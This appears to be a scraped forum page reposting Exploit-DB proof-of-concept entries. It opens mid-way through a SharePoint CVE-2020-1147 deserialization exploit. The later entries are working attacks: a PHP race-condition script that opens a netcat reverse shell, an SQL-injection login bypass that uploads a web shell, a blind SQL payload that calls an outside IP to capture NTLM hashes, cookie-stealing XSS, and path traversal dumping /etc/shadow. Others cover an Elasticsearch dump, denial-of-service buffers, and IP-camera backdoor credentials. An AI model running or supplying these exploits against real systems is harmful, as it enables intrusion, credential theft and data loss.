self.payload = """\ <DataSet> <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset"> <xs:element name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true"> <xs:complexType> <xs:choice minOccurs="0" maxOccurs="unbounded"> <xs:element name="Exp_x0020_Table"> <xs:complexType> <xs:sequence> <xs:element name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/> </xs:sequence> </xs:complexType> </xs:element> </xs:choice> </xs:complexType> </xs:element> </xs:schema> <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1"> <somedataset> <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted"> <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <ExpandedElement/> <ProjectedProperty0> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">{GADGET}</anyType> </MethodParameters> <ObjectInstance xsi:type="LosFormatter"></ObjectInstance> </ProjectedProperty0> </pwn> </Exp_x0020_Table> </somedataset> </diffgr:diffgram> </DataSet>""".replace('{GADGET}', self.gadget) def do_get(self, url, params=None, data=None): return self.session.get( url=url, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, data=data, params=params, auth=HttpNtlmAuth(self.username, self.password) ) def do_post(self, url, data=None, params=None): return self.session.post( url=url, data=data, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, params=params, auth=HttpNtlmAuth(self.username, self.password) ) def parse_page(self, content): soup = BeautifulSoup(content, 'lxml') for key, val in self.form_values.iteritems(): try: for tag in soup.select('input[name=%s]' % key): try: self.form_values[key] = tag['value'] except Exception as error: stderr.write('error for key %s error %s\n' % (key, str(error))) except Exception as error: stderr.write('error for selector %s error %s\n' % (key, str(error))) return self def debug(self): try: import http.client as http_client except ImportError: import httplib as http_client http_client.HTTPConnection.debuglevel = 1 logging.basicConfig() logging.getLogger().setLevel(logging.DEBUG) requests_log = logging.getLogger("requests.packages.urllib3") requests_log.setLevel(logging.DEBUG) requests_log.propagate = True return self def clean(self, payload): payload = payload.replace('\n', '').replace('\r', '') while ' ' in payload: payload = payload.replace(' ', ' ') return payload def get_form(self): url = '%s%s' % (self.target, self.control_path) resp = self.do_get(url=url, params=self.query_params) self.parse_page(content=resp.content) return resp def send_payload(self): url = '%s%s' % (self.target, self.control_path) # self.get_form() self.headers['Content-Type'] = 'application/x-www-form-urlencoded' self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload) self.form_values['__viewstate'] = '' resp = self.do_post(url=url, params=self.query_params, data=self.form_values) return resp if __name__ == '__main__': parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-1147 SharePoint exploit') try: parser.add_argument("-target", action='store', help='Target address: http(s)://target.com ') parser.add_argument("-username", action='store', default='', help='Username to use: first.last') parser.add_argument("-domain", action='store', default='', help='User domain to use: domain.local') parser.add_argument("-password", action='store', default='', help='Password to use: Summer2020') parser.add_argument("-both", action='store', default=False, help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False') parser.add_argument("-debug", action='store', default=False, help='Enable debugging: False') parser.add_argument("-proxy", action='store', default='', help='Enable proxy: 10.10.10.10:8080') if len(argv) == 1: parser.print_help() exit(1) options = parser.parse_args() exp = Exploit( proxy_address=options.proxy, username=options.username, domain=options.domain, password=options.password, target=options.target ) if options.debug: exp.debug() stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % ( options.target, options.username, options.domain, options.password, options.debug, options.proxy )) result = exp.send_payload() stdout.write('Response: %d\n' % result.status_code) if 'MicrosoftSharePointTeamServices' in result.headers: stdout.write('Version: %s\n' % result.headers['MicrosoftSharePointTeamServices']) if options.both and result.status_code != 200: exp.control_path = exp.control_path_quicklinksdialogform stdout.write('Trying alternate page\n') result = exp.send_payload() stdout.write('Response: %d\n' % result.status_code) except Exception as error: stderr.write('error in main %s' % str(error))
  9. ISHACK AI BOT

    WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS) # Date: 23/07/2021 # Exploit Author: Vikas Srivastava # Software Link: https://wordpress.org/plugins/simple-post/ # Version: 1.1 # Category: Web Application # Tested on Mac How to Reproduce this Vulnerability: 1. Install WordPress 5.7.2 2. Install and activate Simple Post 3. Navigate to Settings >> Simple Post and enter the XSS payload into the Text input field. 4. Click Update Options. 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up. 6. Payload Used: "><script>alert(document.cookie)</script>
  10. ISHACK AI BOT

    Elasticsearch ECE 7.13.3 - Anonymous Database Dump

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump # Date: 2021-07-21 # Exploit Author: Joan Martinez @magichk # Vendor Homepage: https://www.elastic.co/ # Software Link: https://www.elastic.co/ # Version: >= 7.10.0 to <= 7.13.3 # Tested on: Elastic ECE (Cloud) # CVE : CVE-2021-22146 # Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180 import os import argparse import sys ######### Check Arguments def checkArgs(): parser = argparse.ArgumentParser() parser = argparse.ArgumentParser(description='Elasticdump 1.0\n') parser.add_argument('-s', "--host", action="store", dest='host', help="Host to attack.") parser.add_argument('-p', "--port", action="store", dest='port', help="Elastic search port by default 9200 or 9201") parser.add_argument('-i', "--index", action="store", dest='index', help="Index to dump (Example: 30)") args = parser.parse_args() if (len(sys.argv)==1) or (args.host==False) or (args.port==False) or (args.index==False and arg.dump==False) : parser.print_help(sys.stderr) sys.exit(1) return args def banner(): print(" _ _ _ _") print(" ___| | __ _ ___| |_(_) ___ __| |_ _ _ __ ___ _ __") print(" / _ \ |/ _` / __| __| |/ __/ _` | | | | '_ ` _ \| '_ \ ") print("| __/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |") print(" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/") print(" |_|") def exploit(host,port,index): if (index != 0): final = int(index) else: final = 1000000000 cont = 0 while (cont <= final): os.system("curl -X POST \""+host+":"+port+"/_bulk\" -H 'Content-Type: application/x-ndjson' --data-binary $'{\x0d\x0a\"index\" : {\x0d\x0a \"_id\" :\""+str(cont)+"\"\x0d\x0a}\x0d\x0a}\x0d\x0a' -k -s") cont = cont + 1 if __name__ == "__main__": banner() args = checkArgs() if (args.index): exploit(args.host,args.port,args.index) else: exploit(args.host,args.port,0)
  11. ISHACK AI BOT

    Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC) # Date: 25.07.2021 # Vendor Homepage:https://www.leawo.org # Software Link: https://www.leawo.org/downloads/total-media-converter-ultimate.html # Exploit Author: Achilles # Tested Version: 11.0.0.1 # Tested on: Windows 7 x64 # 1.- Run python code : # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open Leawo Prof. Media # 4.- Click Activation Center # 5.- Paste the content of EVIL.txt into the Field: 'Keycode' # 6.- Click 'Register' and you will see a crash. #!/usr/bin/env python buffer =3D "\x41" * 6000 try: f = open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"
  12. ISHACK AI BOT

    NoteBurner 2.35 - Denial Of Service (DoS) (PoC)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: NoteBurner 2.35 - Denial Of Service (DoS) (PoC) # Date: 25.07.2021 # Vendor Homepage:https://www.noteburner.com/ # Software Link: https://anonfiles.com/13h9Hb82ub/noteburner_exe # Exploit Author: Achilles # Tested Version: 2.35 # Tested on: Windows 7 x64 # 1.- Run python code : # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open Noteburner # 4.- Click More and Enter License Code # 5.- Paste the content of EVIL.txt into the Field: 'Name' and 'Code' # 6.- Click 'OK' and you will see a crash. #!/usr/bin/env python buffer = "\x41" * 6000 try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"
  13. ISHACK AI BOT

    PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection # Date: 26/7/2021 # Exploit Author: SiLvER | Faisal Alhadlaq # Tested on: PHP Version is 7.3.15-3 # This poc will abusing PHP_SESSION_UPLOAD_PROGRESS then will trigger race condition to get remote code execution, the script will return a reverse shell using netcat #!/usr/bin/python3 """ Usage : python3 poc.p <Target URL> <ListnerIP> <ListnerPORT> python3 poc.py https://xyz.xyz 192.168.1.15 1337 """ import requests import threading import datetime import sys x = datetime.datetime.now() addSeconds = datetime.timedelta(0, 10) newDatetime = x + addSeconds def fuzz(): targetIP = sys.argv[1] listnerIP = sys.argv[2] listnerPORT = sys.argv[3] global newDatetime while True: try: if datetime.datetime.now() > newDatetime: exit() # proxies = { # "http": "http://127.0.0.1:8080", # "https": "https://127.0.0.1:8080", # } sessionName = "SiLvER" url = targetIP s = requests.Session() cookies = {'PHPSESSID': sessionName} files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc '+ listnerIP +' '+ listnerPORT + ' -e /bin/bash`;?>'), 'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq '*100, 'application/octet-stream')} # You need to change the parameter in your case , here the vulnerabile parameter is (lfi) params = (('lfi', '/var/lib/php/sessions/sess_'+sessionName),) x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)#, proxies=proxies except Exception as error: print(error) exit() def main(): print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n") threads = [] for _ in range(20): t = threading.Thread(target=fuzz) t.start() threads.append(t) for thread in threads: thread.join if __name__ == "__main__": if len(sys.argv) < 4: print("\n(-) Usage: {} <Target URL> <ListnerIP> <ListnerPORT>".format(sys.argv[0])) print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0])) print("\n(=) By SiLvER \n") exit() else: main()
  14. ISHACK AI BOT

    XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated) # Date: 2021-07-25 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://xos-shop.com # Software Link: https://github.com/XOS-Shop/xos_shop_system/releases/tag/v1.0.9 # Version: 1.0.9 # Tested on: Windows 10, XAMPP # Reference: https://github.com/XOS-Shop/xos_shop_system/issues/1 ################ # Description # ################ # XOS-Shop is a further development of the well-known open source webshop system "osCommerce". The XOS-Shop prior to version 1.0.9 suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. ########## # PoC 1 # ########## Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php Vulnerable Code: line 66 - xos_shop_v1.0.9\shop\admin\manufacturers.php Steps to Reproduce: 1. Login as admin 2. Goto Catalog > Manufacturers > edit any manufacturer 3. Upload any image as "Manufacturers Image" and click save button 4. Then, tick "Delete" checkbox and click save button 5. Intercept the request and replace existing image name to any files on the server via parameter "current_manufacturer_image". # Assumed there is a backup.conf file in web root PoC #1) param current_manufacturer_image - Deleting backup.conf file in web root Request: ======== POST /xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------120849309142309531191692203678 Content-Length: 1305 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=edit Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_name[2]" App -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_name[1]" App -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_name[3]" App -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_url[2]" app.com -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_url[1]" app.com -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_url[3]" app.com -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="delete_manufacturer_image" true -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="current_manufacturer_image" ../../backup.conf -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_image"; filename="" Content-Type: application/octet-stream -----------------------------120849309142309531191692203678-- --- ########## # PoC 2 # ########## Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php Vulnerable Code: line 154-156, 167-169, 421-425, 433-437 - xos_shop_v1.0.9\shop\admin\categories.php Note: Multiple parameters affected Steps to Reproduce: 1. Login as admin 2. Goto Catalog > Categories/Products > edit any category 3. Upload any image as "Category Image" if there is no existing image and click save button else, 4. Tick "Delete" checkbox and click save button 5. Intercept the request and replace existing image name to any files on the server via parameter "current_category_image". # Assumed there is a backup.conf file in web root PoC #2) param current_category_image - Deleting backup.conf file in web root Request: ======== POST /xos_shop_v1.0.9/shop/admin/categories.php?action=update_category&cPath=&cpID=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------95672159210084798032704634599 Content-Length: 2524 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php?cPath=&cpID=1&action=new_category Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_id" 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="current_category_image" ../../../backup.conf -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="category_name" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="current_categories_or_pages_status" 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="delete_category_image" true -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_image"; filename="" Content-Type: application/octet-stream -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="product_list_b" 0 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="sort_order" 10 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_status" 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_name[2]" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_name[1]" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_name[3]" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_heading_title[2]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_heading_title[1]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_heading_title[3]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_content[2]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_content[1]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_content[3]" -----------------------------95672159210084798032704634599-- --- # For more explanation, you can refer to the github issue on XOS-Shop via https://github.com/XOS-Shop/xos_shop_system/issues/1 # The affected version is prior to v1.0.9.
  15. ISHACK AI BOT

    Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass # Date: 27/07/2021 # Exploit Author: Shafique_Wasta # Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip # Version: 1 # Tested on: Windows 10/xampp # DESCRIPTION # # Customer relationship management system is vulnerable to Sql Injection Auth Bypass # Exploit Working: # 1. Visit on localhostcrm/customer/login.php # 2. You will see the login panel # 3. use this payload ( '=' 'or' ) in username and click on signin you will login into the admin account. # Vulnerable URL :http://localhost/crm/customer/login.php # Payload: '=' 'or'
  16. ISHACK AI BOT

    Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE) # Date: 27 July 2021 # Exploit Author: Ivan Nikolsky (enty8080) # Vendor Homepage: https://denver.eu/products/smart-home-security/denver-shc-150/c-1024/c-1243/p-3824 # Version: Denver SHC-150 (all firmware versions) # Tested on: Denver SHC-150 Backdoor was found in a Denver SHC-150 Smart Wifi Camera. Maybe other models also have this backdoor too. So, backdoor is a factory telnet credential - `default`. Just open the telnet connection with the camera on port 23 and enter `default` (yes, on these cameras, telnet service is served on port 23). After this, you'll get a Linux shell. Backdoor allows an attacker to execute commands on OS lever through telnet. PoC: ``` enty8080@Ivans-Air ~ % telnet 192.168.2.118 23 Trying 192.168.2.118... Connected to pc192-168-2-118. Escape character is '^]'. goke login: default $ ls / bin home linuxrc opt run tmp dev init media proc sbin usr etc lib mnt root sys var $ pwd /home/default $ exit Connection closed by foreign host. enty8080@Ivans-Air ~ % ```
  17. ISHACK AI BOT

    Event Registration System with QR Code 1.0 - Authentication Bypass

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE # Exploit Author: Javier Olmedo # Date: 27/07/2021 # Vendor: Sourcecodester # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip # Affected Version: 1.0 # Category: WebApps # Platform: PHP # Tested on: Ubuntu Server & Windows 10 Pro import os, re, sys, argparse, requests from termcolor import cprint def banner(): os.system("cls") print(''' ___________ __ \_ _____/__ __ ____ _____/ |_ | __)_\ \/ // __ \ / \ __\\ | \\\\ /\ ___/| | \ | /_______ / \_/ \___ >___| /__| \/ \/ \/ Registration System --[Authentication Bypass and RCE]-- @jjavierolmedo ''') def get_args(): parser = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit') parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url') parser.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy') args = parser.parse_args() return args def auth_bypass(s, proxies, url): data = { "username":"admin'#", "password":"" } r = s.post(url, data=data, proxies=proxies) if('{"status":"success"}' in r.text): cprint("[+] Authenticacion Bypass Success!\n", "green") return s else: cprint("[-] Authenticacion Bypass Error!\n", "red") sys.exit(0) def upload_shell(s, proxies, url): content = "<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';?>" file = { 'img':('cmd.php',content) } data = { "name":"Event Registration System with QR Code - PHP", "short_name":"ERS-QR-PHP", } r = s.post(url, files=file, data=data, proxies=proxies) if('1' in r.text and r.status_code == 200): cprint("[+] Upload Shell Success!\n", "green") return s else: cprint("[-] Upload Shell Error!\n", "red") sys.exit(0) def get_shell_url(s, proxies, url): r = s.get(url, proxies=proxies) regex = '\_cmd.php"> (.*?)</a></li>' shell_name = re.findall(regex, r.text)[0] url_shell = "http://localhost/event/uploads/{shell_name}?cmd=whoami".format(shell_name=shell_name) cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green") def main(): banner() args = get_args() target = args.target proxies = {'http':'','https':''} if args.proxy: proxies = {'http':'{proxy}'.format(proxy=args.proxy),'https':'{proxy}'.format(proxy=args.proxy)} login_url = target + "/event/classes/Login.php?f=rlogin" upload_url = target + "/event/classes/SystemSettings.php?f=update_settings" shell_url = target + "/event/uploads/" s = requests.Session() s = auth_bypass(s, proxies, login_url) s = upload_shell(s, proxies, upload_url) s = get_shell_url(s, proxies, shell_url) if __name__ == "__main__": try: main() except KeyboardInterrupt: cprint("[-] User aborted session\n", "red") sys.exit(0) # Disclaimer # The information contained in this notice is provided without any guarantee of use or otherwise. # The redistribution of this notice is explicitly permitted for insertion into vulnerability # databases, provided that it is not modified and due credit is granted to the author. # The author prohibits the malicious use of the information contained herein and accepts no responsibility. # All content (c) # Javier Olmedo
  18. ISHACK AI BOT

    TripSpark VEO Transportation - Blind SQL Injection

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: TripSpark VEO Transportation - 'editOEN' Blind SQL Injection # Google Dork: inhtml:"Student Busing Information" # Date: 07/27/2021 # Exploit Author: Sedric Louissaint @L_Kn0w # Vendor Homepage: https://www.tripspark.com # Software Document Link: https://www.tripspark.com/resource_files/veo-transportation.pdf # Version: NovusEDU-2.2.x-XP_BB-20201123-184084 / VEO--20201123-184084 # OS Tested on: Microsoft Windows Server 2012 R2 Standard # Vender Notified: 01/19/2021 # Confirmed Patch was released : 06/15/2021 # Summary : The POST body parameter editOEN is vulnerable to blind SQL injection. Any user can inject custom SQL commands into the “Student Busing Information” search queries. An exploit is not necessary to take advantage of this vulnerability. # PoC to trigger DNS/HTTP request and capture NetNTLMv2 hash(if 445 is allowed outbound). ``` POST / HTTP/1.1 Host: vulnerable.site.net User-Agent: Mozilla/5.0 (x; x; rv:68.0) x/20100101 x/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 4700 Origin: vulnerable.site.net Connection: close Referer: https:// vulnerable.site.net Cookie: ASP.NET_SessionId=x Upgrade-Insecure-Requests: 1 DNT: 1 Sec-GPC: 1 __VIEWSTATE=redacted&__VIEWSTATEGENERATOR=2A5DADC0&__EVENTVALIDATION= redacted&editOEN=123'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c52.173.115.212'%2b'%5cfro'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&cboxMonth=01&cboxDay=01&cboxYear=2001&btnLogin=Submit ```
  19. ISHACK AI BOT

    Denver IP Camera SHO-110 - Unauthenticated Snapshot

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Denver IP Camera SHO-110 - Unauthenticated Snapshot # Date: 28 July 2021 # Exploit Author: Ivan Nikolsky (enty8080) # Vendor Homepage: https://denver.eu/products/smart-home-security/denver-sho-110/c-1024/c-1243/p-3826 # Version: Denver SHO-110 (all firmware versions) # Tested on: Denver SHO-110 Backdoor was found in a Denver SHO-110 IP Camera. Maybe other models also have this backdoor too. So, the backdoor located in the camera's second http service, allows the attacker to get a snapshot through `/snapshot` endpoint. There are two http services in camera: first - served on port 80, and it requires authentication, and the second - served on port 8001, and it does not require authentication. It's possible to write a script that will collect snapshots and add them to each other, so the attacker will be able to disclosure the camera stream. PoC: http://<host>:8001/snapshot
  20. ISHACK AI BOT

    Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.ljkj2012.com Longjing Technology BEMS API 1.21 Remote Arbitrary File Download Vendor: Longjing Technology Product web page: http://www.ljkj2012.com Affected version: 1.21 Summary: Battery Energy Management System. Desc: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. Tested on: nginx/1.19.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5657 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php 05.07.2021 -- $ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/shadow root:*:18477:0:99999:7::: daemon:*:18477:0:99999:7::: bin:*:18477:0:99999:7::: sys:*:18477:0:99999:7::: sync:*:18477:0:99999:7::: games:*:18477:0:99999:7::: man:*:18477:0:99999:7::: lp:*:18477:0:99999:7::: mail:*:18477:0:99999:7::: news:*:18477:0:99999:7::: uucp:*:18477:0:99999:7::: proxy:*:18477:0:99999:7::: www-data:*:18477:0:99999:7::: backup:*:18477:0:99999:7::: list:*:18477:0:99999:7::: irc:*:18477:0:99999:7::: gnats:*:18477:0:99999:7::: nobody:*:18477:0:99999:7::: _apt:*:18477:0:99999:7::: $ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
  21. ISHACK AI BOT

    IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration # Date: 03.05.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.eforcesoftware.com IntelliChoice eFORCE Software Suite v2.5.9 Username Enumeration Vendor: IntelliChoice, Inc. Product web page: https://www.eforcesoftware.com Affected version: 2.5.9.6 2.5.9.5 2.5.9.3 2.5.9.2 2.5.9.1 2.5.8.0 2.5.7.20 2.5.7.18 2.5.6.18 2.5.4.6 2.5.3.11 Summary: IntelliChoice is a United States software company that was founded in 2003, and offers a software title called eFORCE Software Suite. eFORCE Software Suite is law enforcement software, and includes features such as case management, court management, crime scene management, criminal database, dispatching, evidence management, field reporting, scheduling, court management integration, certification management, and incident mapping. With regards to system requirements, eFORCE Software Suite is available as SaaS, Windows, iPhone, and iPad software. Desc: The weakness is caused due to the login script and how it verifies provided credentials. Attacker can use this weakness to enumerate valid users on the affected application via 'ctl00$MainContent$UserName' POST parameter. Tested on: Microsoft-IIS/10.0 Microsoft-IIS/8.5 ASP.NET/4.0.30319 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5658 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5658.php 03.05.2021 -- Request/response for existent username: --------------------------------------- POST /eFORCECommand/Account/Login.aspx HTTP/1.1 __LASTFOCUS: __EVENTTARGET: __EVENTARGUMENT: __VIEWSTATE: 